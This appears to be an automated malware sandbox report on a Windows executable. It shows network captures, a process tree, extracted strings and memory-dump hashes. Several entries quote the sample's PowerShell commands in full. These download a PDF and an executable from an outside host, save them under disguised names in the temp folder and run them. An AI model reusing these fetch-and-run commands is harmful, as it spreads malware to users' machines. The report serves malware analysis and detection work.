Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49709 | 101.99.75.174 | 443 | 7740 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:53:02 UTC | 180 | OUT | GET /share/alert.pdf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: badlarrysguitars.com
Connection: Keep-Alive
2024-12-06 14:53:02 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Fri, 06 Dec 2024 14:53:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 126079
Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
Content-Disposition: inline; filename=alert.pdf
Cache-Control: no-cache
ETag: "1731699872.0-126079-2713651938"
Connection: close
Content-Type: application/pdf
                                                            2024-12-06 14:53:02 UTC | 7870 | IN | Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 1083/Filter /FlateDecode/Type /XObject/Width 851/BitsPerComponent 8/Length 125221>>streamxe$q\{]wnCp y/gUcHf_f]ud-SUS%I$I$I


                                                            Session ID: 1
                                                            Source IP: 192.168.2.10
                                                            Source Port: 49748
                                                            Destination IP: 54.224.241.105
                                                            Destination Port: 443
                                                            PID: 3472
                                                            Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-06 14:53:14 UTC | 1473 | OUT | GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                            Host: p13n.adobe.io
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Chromium";v="105"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                            Accept: application/json, text/javascript, */*; q=0.01
                                                            x-adobe-uuid: 79164422-1e43-4f8b-9b29-d5ef60e753c7
                                                            x-adobe-uuid-type: visitorId
                                                            x-api-key: AdobeReader9
                                                            sec-ch-ua-platform: "Windows"
                                                            Origin: https://rna-resource.acrobat.com
                                                            Accept-Language: en-US,en;q=0.9
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://rna-resource.acrobat.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            2024-12-06 14:53:15 UTC | 617 | IN | HTTP/1.1 429 Too Many Requests
                                                            Server: openresty
                                                            Date: Fri, 06 Dec 2024 14:53:15 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Methods: GET, OPTIONS
                                                            Access-Control-Allow-Headers: Authorization, Content-Type, X-Api-Key, cache-control, User-Agent, If-None-Match, x-adobe-uuid, x-adobe-uuid-type, X-Request-Id
                                                            Access-Control-Allow-Credentials: true
                                                            Access-Control-Expose-Headers: x-request-id
                                                            Access-Control-Allow-Origin: *
                                                            X-Request-Id: xJ4EoVYEjToyfhZModw0QpeOttQ3UN1h
                                                            Retry-After: 1
                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                            2024-12-06 14:53:15 UTC | 65 | IN | Data Ascii: 36{"error_code":"429050","message":"Too many requests"}0


                                                            Session ID: 2
                                                            Source IP: 192.168.2.10
                                                            Source Port: 49806
                                                            Destination IP: 101.99.75.174
                                                            Destination Port: 443
                                                            PID: 9188
                                                            Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-06 14:53:38 UTC | 181 | OUT | GET /private/nois.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: badlarrysguitars.com
                                                            Connection: Keep-Alive
                                                            2024-12-06 14:53:39 UTC | 187 | IN | HTTP/1.1 500 INTERNAL SERVER ERROR
                                                            Date: Fri, 06 Dec 2024 14:53:39 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 265
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            2024-12-06 14:53:39 UTC | 265 | IN | Data Ascii: <!doctype html><html lang=en><title>500 Internal Server Error</title><h1>Internal Server Error</h1><p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the applica



                                                            Target ID: 3
                                                            Start time: 09:52:55
                                                            Start date: 06/12/2024
                                                            Path: C:\Users\user\Desktop\lg1wwLsmCX.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: "C:\Users\user\Desktop\lg1wwLsmCX.exe"
                                                            Imagebase: 0x400000
                                                            File size: 64'456 bytes
                                                            MD5 hash: 1CEB5D0CB063290C1F66FCCFED96A220
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: low
                                                            Has exited: true

                                                            Target ID: 5
                                                            Start time: 09:52:55
                                                            Start date: 06/12/2024
                                                            Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                            Imagebase: 0x7ff7b2bb0000
                                                            File size: 452'608 bytes
                                                            MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: true

                                                            Target ID: 6
                                                            Start time: 09:52:55
                                                            Start date: 06/12/2024
                                                            Path: C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase: 0x7ff620390000
                                                            File size: 862'208 bytes
                                                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: true

                                                            Target ID: 7
                                                            Start time: 09:53:02
                                                            Start date: 06/12/2024
                                                            Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                            Imagebase: 0x7ff64eb90000
                                                            File size: 5'641'176 bytes
                                                            MD5 hash: 24EAD1C46A47022347DC0F05F6EFBB8C
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: false

                                                            Target ID: 8
                                                            Start time: 09:53:02
                                                            Start date: 06/12/2024
                                                            Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                            Imagebase: 0x7ff63ec50000
                                                            File size: 3'581'912 bytes
                                                            MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: false

                                                            Target ID: 9
                                                            Start time: 09:53:02
                                                            Start date: 06/12/2024
                                                            Path: C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase: 0x7ff7df220000
                                                            File size: 55'320 bytes
                                                            MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: true

                                                            Target ID: 10
                                                            Start time: 09:53:03
                                                            Start date: 06/12/2024
                                                            Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                            Imagebase: 0x7ff63ec50000
                                                            File size: 3'581'912 bytes
                                                            MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: false

                                                            Target ID: 16
                                                            Start time: 09:53:34
                                                            Start date: 06/12/2024
                                                            Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                            Imagebase: 0x7ff7b2bb0000
                                                            File size: 452'608 bytes
                                                            MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high
                                                            Has exited: true

                                                            Target ID: 17
                                                            Start time: 09:53:34
                                                            Start date: 06/12/2024
                                                            Path: C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase: 0x7ff620390000
                                                            File size: 862'208 bytes
                                                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Has exited: true

                                                              Strings
                                                              • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                              • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1855110810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.1855087718.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000003.00000002.1855131135.0000000000402000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000003.00000002.1855150349.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_lg1wwLsmCX.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                              • API String ID: 0-3628893888
                                                              • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                              • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                              • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                              • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1855110810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.1855087718.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000003.00000002.1855131135.0000000000402000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000003.00000002.1855150349.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_lg1wwLsmCX.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                              • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                              • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                              • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1667280316.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff7c0230000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 9b425afaaa7e7c3ed29c7e1bdedf7c270348b3f2e54f84b96570d038298faab8
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: D501677111CB0D4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1845735492.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae566c5fc9d8a3468a7232aad6b31080ee2c1b6e1dfad12d0f2a294cec5d6e92
                                                              • Instruction ID: 5d2e90023411157aa800a9987b8da286d18a54b8463101eab8588a38b1580d49
                                                              • Opcode Fuzzy Hash: ae566c5fc9d8a3468a7232aad6b31080ee2c1b6e1dfad12d0f2a294cec5d6e92
                                                              • Instruction Fuzzy Hash: D1D10631A0DA895FE795BB2848555B9BBE1FF0A360B4802FED04DCB2D3DB14AC15C7A1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71285e23cba60297ae064e3d48f3161cea21363c46d6d6db04f119cae0a4aecc
                                                              • Instruction ID: 9bf9e8902d31bcef38e1a800f86a81f95bfa910854b8e1b48165ee84a027169e
                                                              • Opcode Fuzzy Hash: 71285e23cba60297ae064e3d48f3161cea21363c46d6d6db04f119cae0a4aecc
                                                              • Instruction Fuzzy Hash: 2DD1C37190DA898FEB56EF6898557E9BFA0FF12320F0441FBC08DC7193DA246949CB91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e7bc5926bbd18bf0f39e470fd6aacdb84a27a3935b4fd3ab6d71f598f9b5012
                                                              • Instruction ID: 2b62f9477515b8d4ee198d46afd1753bf9f322467230cd85f86dbbe73edb224a
                                                              • Opcode Fuzzy Hash: 7e7bc5926bbd18bf0f39e470fd6aacdb84a27a3935b4fd3ab6d71f598f9b5012
                                                              • Instruction Fuzzy Hash: 2EB1CF31D0DA894FEB95EF6898557E8BFA0EF12320F0441EBC08DD7193DE246989CB91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: 3049342dcea82a1dae4426f5abbf23768d572ab71b25094a4af8133c578e7b11
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: D601677111CB0D4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45